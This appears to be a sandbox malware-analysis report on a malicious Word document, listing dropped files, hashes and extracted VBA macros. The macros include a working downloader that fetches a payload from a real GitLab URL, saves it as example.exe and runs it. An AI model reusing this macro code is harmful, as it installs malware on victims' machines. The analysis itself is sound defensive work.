                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF86F4806030F55B35.TMP

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF8D1F9E864A39FAA1.TMP

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):512
                                                                                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3::
                                                                                                                                                                                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                                                                                                                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                                                                                                                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                                                                                                                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                C:\Users\user\Desktop\q9JZUaS1Gy.doc (copy)

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal, Last Saved By: user, Revision Number: 28, Name of Creating Application: Microsoft Office Word, Total Editing Time: 33:00, Create Time/Date: Mon Dec 16 03:28:00 2024, Last Saved Time/Date: Tue Jan 14 14:47:00 2025, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):103424
                                                                                                                                                                                                                                Entropy (8bit):5.0334480501757035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:wgTCtLj90/P6PhGi/dB1P1AHyEivuZc98Uv6LKD:698Uv6LKD
                                                                                                                                                                                                                                MD5:ACBC3E469D0B803B6CE8AE19C3AF9D73
                                                                                                                                                                                                                                SHA1:D023ED5718B284A27B1E75486374B06194CE7BA8
                                                                                                                                                                                                                                SHA-256:EAD4D25586CAFA2970A674A477C2E71DC7ED23504D6D7149435B3AD51023DA7B
                                                                                                                                                                                                                                SHA-512:AD961E0A6481C8482D4DDF6C2E14F5B307E99BE4F2E5B6C5244BD81603BF810C08507851D666735EC5B2B3EEAFB15978AA6186335386686731B1B77E7926BDFF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:......................>.......................(...........*...............'...:..................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ....................0.....bjbj0.0...........................R.eiR.ei..................................................................................F.......F...........................................................................................................G...t.......................................................................................................................$...........q...<.........................................................................

                                                                                                                                                                                                                                C:\Users\user\Desktop\~$JZUaS1Gy.doc

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):162
                                                                                                                                                                                                                                Entropy (8bit):2.7194453463459216
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:xdll9LD/i/YFPXn/lfll0hUnzLUo:nll1D/i/YFPXJzoo
                                                                                                                                                                                                                                MD5:6F7C594F3F4BA38D21A1B1B72F79A969
                                                                                                                                                                                                                                SHA1:FE1E400C77C5AA1B926C02DA3477ACA64D647496
                                                                                                                                                                                                                                SHA-256:06727613E4B88E4B54D706339FE8BD9CED80AFF5EC450DADFC13D3252B3CEB6E
                                                                                                                                                                                                                                SHA-512:25FC373216113BEF305EFC748CFD1B611A6799CB1D878FAA7439A023B6B3CC3BD7075F0A40123C7CFAE28D7CBBED148E05697E08D6BEDF3C46340352CCE2EEB6
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Preview:.user...................................................b.r.o.k...8..........O...........a.j............................................+...'..}.]j........=.j

                                                                                                                                                                                                                                C:\Users\user\Desktop\~WRD0000.tmp

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal, Last Saved By: user, Revision Number: 28, Name of Creating Application: Microsoft Office Word, Total Editing Time: 33:00, Create Time/Date: Mon Dec 16 03:28:00 2024, Last Saved Time/Date: Tue Jan 14 14:47:00 2025, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):103424
                                                                                                                                                                                                                                Entropy (8bit):5.0334480501757035
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3072:wgTCtLj90/P6PhGi/dB1P1AHyEivuZc98Uv6LKD:698Uv6LKD
                                                                                                                                                                                                                                MD5:ACBC3E469D0B803B6CE8AE19C3AF9D73
                                                                                                                                                                                                                                SHA1:D023ED5718B284A27B1E75486374B06194CE7BA8
                                                                                                                                                                                                                                SHA-256:EAD4D25586CAFA2970A674A477C2E71DC7ED23504D6D7149435B3AD51023DA7B
                                                                                                                                                                                                                                SHA-512:AD961E0A6481C8482D4DDF6C2E14F5B307E99BE4F2E5B6C5244BD81603BF810C08507851D666735EC5B2B3EEAFB15978AA6186335386686731B1B77E7926BDFF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                Preview:......................>.......................(...........*...............'...:..................................................................................................................................................................................................................................................................................................................................................................................................................................................Q.. ....................0.....bjbj0.0...........................R.eiR.ei..................................................................................F.......F...........................................................................................................G...t.......................................................................................................................$...........q...<.........................................................................

                                                                                                                                                                                                                                C:\Users\user\Desktop\~WRD0000.tmp:Zone.Identifier

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                                                                                                                                C:\Users\user\Documents\example.exe

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                Size (bytes):39173984
                                                                                                                                                                                                                                Entropy (8bit):7.798972711535619
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:786432:Ybn8tTE83oyUNmx4osm5GYHAFLGTLAkaQtEhfdzLIlAeWlT:Yb8tx35omWMZALqbShlIlhI
                                                                                                                                                                                                                                MD5:63B58E59519DB03CE6D393681D4442A8
                                                                                                                                                                                                                                SHA1:C780C31C9DCF745FE54B7CDA87F975B0C299636D
                                                                                                                                                                                                                                SHA-256:272CBC052BC03486AB9026FDDC04CC3C93039A8B950BDDE9016291A260B2B840
                                                                                                                                                                                                                                SHA-512:D4FE95736D057C29DC3D1A6062D86D120EECC7588DA3612C9FB48642B5715966C37E817A1A799515DC053CD66B832401ADF3BEC016B9DE9844DB7CCFEC973C06
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Y..N8.DN8.DN8.DG@vDX8.D...EZ8.D...E\8.D...E.8.D>..EF8.D>..EC8.DN8.DF:.D]..E[8.D]..E.:.D]..EO8.D]..DO8.D]..EO8.DRichN8.D........PE..d...!_.g.........."....(..a...2.......\........@..........................................`..........................................fy......gy.h....p........{..`....U.h.......,~....p.T.....................p.(...@Eb.@.............a......dy.`....................text.....a.......a................. ..`.CLR_UEF......a.......a............. ..`.rdata........a.......a.............@..@.data.........y......ty.............@....pdata...`....{..b....z.............@..@.didat..8............n}.............@...Section...... .......p}.............@..._RDATA...2...0...4...r}.............@..@.rsrc........p........~.............@..@.reloc..,~..........................@..B................................................................................

                                                                                                                                                                                                                                Static File Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal, Last Saved By: Victim, Revision Number: 27, Name of Creating Application: Microsoft Office Word, Total Editing Time: 29:00, Create Time/Date: Mon Dec 16 06:28:00 2024, Last Saved Time/Date: Mon Dec 16 10:19:00 2024, Number of Pages: 1, Number of Words: 3, Number of Characters: 18, Security: 0
                                                                                                                                                                                                                                Entropy (8bit):5.028164721042547
                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                • Microsoft Word document (32009/1) 54.23%
                                                                                                                                                                                                                                • Microsoft Word document (old ver.) (19008/1) 32.20%
                                                                                                                                                                                                                                • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                                                                                                                                                                                                                File name:q9JZUaS1Gy.doc
                                                                                                                                                                                                                                File size:103'424 bytes
                                                                                                                                                                                                                                MD5:f8de9b2f8b9088be3dda1985fe7b20c3
                                                                                                                                                                                                                                SHA1:edba0fb7fdd51294bf183a8d7ab8992bb1762ff5
                                                                                                                                                                                                                                SHA256:0f53abadce48014ec8ea5458af9b732ed1ea6d612b54b261a0e60928e36e86f1
                                                                                                                                                                                                                                SHA512:1c31f24df1faa858edee44e14e7f7f90f68aa28de23a6debd7e61a99eaf33ae5921f10822a3efc028ea4ba4609f5d616fe050254c16dce19830b4caf4261106f
                                                                                                                                                                                                                                SSDEEP:3072:1VKKLjov0/P6PhGi/dB1P1AHyEivubc98UvBuTh:bKj98UvBg
                                                                                                                                                                                                                                TLSH:00A31649F181C92EDAD409B64C9BDBFEB3387D06AE44D71732A0B75E2CB27A4C146384
                                                                                                                                                                                                                                File Content Preview:........................>.......................(...........*...............'...y..............................................................................................................................................................................

                                                                                                                                                                                                                                File Icon

                                                                                                                                                                                                                                Icon Hash:35e1cc889a8a8599

                                                                                                                                                                                                                                Static OLE Info

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Document Type:OLE
                                                                                                                                                                                                                                Number of OLE Files:1

                                                                                                                                                                                                                                OLE File "q9JZUaS1Gy.doc"

                                                                                                                                                                                                                                Indicators
                                                                                                                                                                                                                                Has Summary Info:
                                                                                                                                                                                                                                Application Name:Microsoft Office Word
                                                                                                                                                                                                                                Encrypted Document:False
                                                                                                                                                                                                                                Contains Word Document Stream:True
                                                                                                                                                                                                                                Contains Workbook/Book Stream:False
                                                                                                                                                                                                                                Contains PowerPoint Document Stream:False
                                                                                                                                                                                                                                Contains Visio Document Stream:False
                                                                                                                                                                                                                                Contains ObjectPool Stream:False
                                                                                                                                                                                                                                Flash Objects Count:0
                                                                                                                                                                                                                                Contains VBA Macros:True
                                                                                                                                                                                                                                Summary
                                                                                                                                                                                                                                Code Page:1252
                                                                                                                                                                                                                                Title:
                                                                                                                                                                                                                                Subject:
                                                                                                                                                                                                                                Author:ADMIN
                                                                                                                                                                                                                                Keywords:
                                                                                                                                                                                                                                Comments:
                                                                                                                                                                                                                                Template:Normal
                                                                                                                                                                                                                                Last Saved By:Victim
                                                                                                                                                                                                                                Revion Number:27
                                                                                                                                                                                                                                Total Edit Time:1740
                                                                                                                                                                                                                                Create Time:2024-12-16 06:28:00
                                                                                                                                                                                                                                Last Saved Time:2024-12-16 10:19:00
                                                                                                                                                                                                                                Number of Pages:1
                                                                                                                                                                                                                                Number of Words:3
                                                                                                                                                                                                                                Number of Characters:18
                                                                                                                                                                                                                                Creating Application:Microsoft Office Word
                                                                                                                                                                                                                                Security:0
                                                                                                                                                                                                                                Document Summary
                                                                                                                                                                                                                                Document Code Page:1252
                                                                                                                                                                                                                                Number of Lines:1
                                                                                                                                                                                                                                Number of Paragraphs:1
                                                                                                                                                                                                                                Thumbnail Scaling Desired:False
                                                                                                                                                                                                                                Company:
                                                                                                                                                                                                                                Contains Dirty Links:False
                                                                                                                                                                                                                                Shared Document:False
                                                                                                                                                                                                                                Changed Hyperlinks:False
                                                                                                                                                                                                                                Application Version:1048576

                                                                                                                                                                                                                                Streams with VBA

                                                                                                                                                                                                                                VBA File Name: Module1.bas, Stream Size: 1128
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:Macros/VBA/Module1
                                                                                                                                                                                                                                VBA File Name:Module1.bas
                                                                                                                                                                                                                                Stream Size:1128
                                                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . < 4 . . . . . . < . . . . . . . < . . . . . . . < . . . . . . . . . . . . . . . . x . . . . . .
                                                                                                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 02 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 0a 03 00 00 ce 03 00 00 00 00 00 00 01 00 00 00 d4 44 12 16 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                VBA Code
                                                                                                                                                                                                                                Attribute VB_Name = "Module1"
Public Sub CallTestAES()
    Dim kakensooe As New ViewSession
    kakensooe.ikwiwiejs_19293_Ade
    
End Sub

                                                                                                                                                                                                                                VBA File Name: Module2.bas, Stream Size: 4972
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:Macros/VBA/Module2
                                                                                                                                                                                                                                VBA File Name:Module2.bas
                                                                                                                                                                                                                                Stream Size:4972
                                                                                                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . n . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 fa 04 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 01 05 00 00 81 0e 00 00 00 00 00 00 01 00 00 00 d4 44 0d 70 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                VBA Code
                                                                                                                                                                                                                                Attribute VB_Name = "Module2"
Option Explicit

' Function chuy?n hex thnh nh? phn (byte array)
Function HexToBinary(hexString As String) As Byte()
    Dim i As Long
    Dim length As Long
    Dim byteArray() As Byte

    length = Len(hexString) \ 2
    ReDim byteArray(length - 1)

    For i = 0 To length - 1
        byteArray(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2))
    Next i

    HexToBinary = byteArray
End Function

' Function t?i d? li?u hex t? URL
Function GetDataFromURL(url As String) As String
    Dim http As Object
    Set http = CreateObject("MSXML2.XMLHTTP")

    On Error Resume Next
    http.Open "GET", url, False
    http.Send
    
    If http.Status = 200 Then
        GetDataFromURL = http.responseText
    Else
        GetDataFromURL = ""
    End If
    
    On Error GoTo 0
    Set http = Nothing
End Function

' Sub luu file EXE t? d? li?u hex v ch?y
Sub DownloadAndRunEXE()
    Dim hexData As String
    Dim binaryData() As Byte
    Dim savePath As String
    Dim fileNum As Integer
    Dim i As Long

    ' Bu?c 1: T?i d? li?u hex t? URL
    hexData = GetDataFromURL("https://gitlab.com/app8490744/updatesa/-/raw/main/up") ' Thay URL b?ng link th?c t?

    If hexData = "" Then
        MsgBox "Khng t?i du?c d? li?u t? URL.", vbCritical, "L?i"
        Exit Sub
    End If

    ' Bu?c 2: Chuy?n hex thnh nh? phn
    binaryData = HexToBinary(hexData)

    ' Bu?c 3: Luu d? li?u thnh file EXE
    savePath = Environ("USERPROFILE") & "\Documents\example.exe" ' u?ng d?n luu file
    fileNum = FreeFile
    
    Open savePath For Binary As #fileNum
    For i = LBound(binaryData) To UBound(binaryData)
        Put #fileNum, , binaryData(i)
    Next i
    Close #fileNum

    ' Bu?c 4: Ki?m tra file v ch?y
    If Len(Dir(savePath)) > 0 Then
        Dim shell As Object
        Set shell = CreateObject("WScript.Shell")
        
        ' Ch?y file EXE
        shell.Run """" & savePath & """", 1, False
        MsgBox "File EXE d du?c t?i v ch?y thnh cng!", vbInformation, "Thnh cng"
    Else
        MsgBox "Khng th? t?o file EXE.", vbCritical, "L?i"
    End If
End Sub

                                                                                                                                                                                                                                VBA File Name: Module3.bas, Stream Size: 48244
                                                                                                                                                                                                                                General
                                                                                                                                                                                                                                Stream Path:Macros/VBA/Module3
                                                                                                                                                                                                                                VBA File Name:Module3.bas
                                                                                                                                                                                                                                Stream Size:48244
                                                                                                                                                                                                                                Data ASCII:. . . . . 4 . . . C . . . . . . . . . . C . . . . . . . . . . . . D . . . . . . . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . R t l M o v e M e m o r y . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . V a r P t r . . . . . x . . . 0 . . . . . . . . . . . . . . . . . . . . . . . h t o n l . . . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . S y s t e m F u n c t i o n 0 3 6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B C r
                                                                                                                                                                                                                                Data Raw:01 16 03 00 00 34 05 00 00 be 43 00 00 18 05 00 00 1c 06 00 00 ff ff ff ff c6 43 00 00 fe 94 00 00 08 00 00 00 01 00 00 00 d4 44 f8 87 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 44 04 00 00 00 00 9e 02 20 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 74 6c 4d 6f 76 65 4d 65 6d 6f 72 79 00 00 00 00 00 a4 02 50 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                VBA Code
                                                                                                                                                                                                                                Attribute VB_Name = "Module3"
'--- mdAesCtr.bas
Option Explicit
DefObj A-Z

#Const HasPtrSafe = (VBA7 <> 0) Or (TWINBASIC <> 0)

'=========================================================================
' API
'=========================================================================

#If Win64 Then
    Private Const PTR_SIZE                  As Long = 8
#Else
    Private Const PTR_SIZE                  As Long = 4
#End If

#If HasPtrSafe Then
Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#Else
Private Enum LongPtr
    [_]
End Enum
Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Private Declare Function ArrPtr Lib "msvbvm60" Alias "VarPtr" (Ptr() As Any) As LongPtr
Private Declare Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
Private Declare Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
'--- bcrypt
Private Declare Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
Private Declare Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
Private Declare Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
Private Declare Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
#End If
#If Not ImplUseShared Then
    #If HasPtrSafe Then
    Private Declare PtrSafe Function CryptStringToBinary Lib "crypt32" Alias "CryptStringToBinaryW" (ByVal pszString As LongPtr, ByVal cchString As Long, ByVal dwFlags As Long, ByVal pbBinary As LongPtr, pcbBinary As Long, pdwSkip As Long, pdwFlags As Long) As Long
    Private Declare PtrSafe Function CryptBinaryToString Lib "crypt32" Alias "CryptBinaryToStringW" (ByVal pbBinary As LongPtr, ByVal cbBinary As Long, ByVal dwFlags As Long, ByVal pszString As LongPtr, pcchString As Long) As Long
    Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
    Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
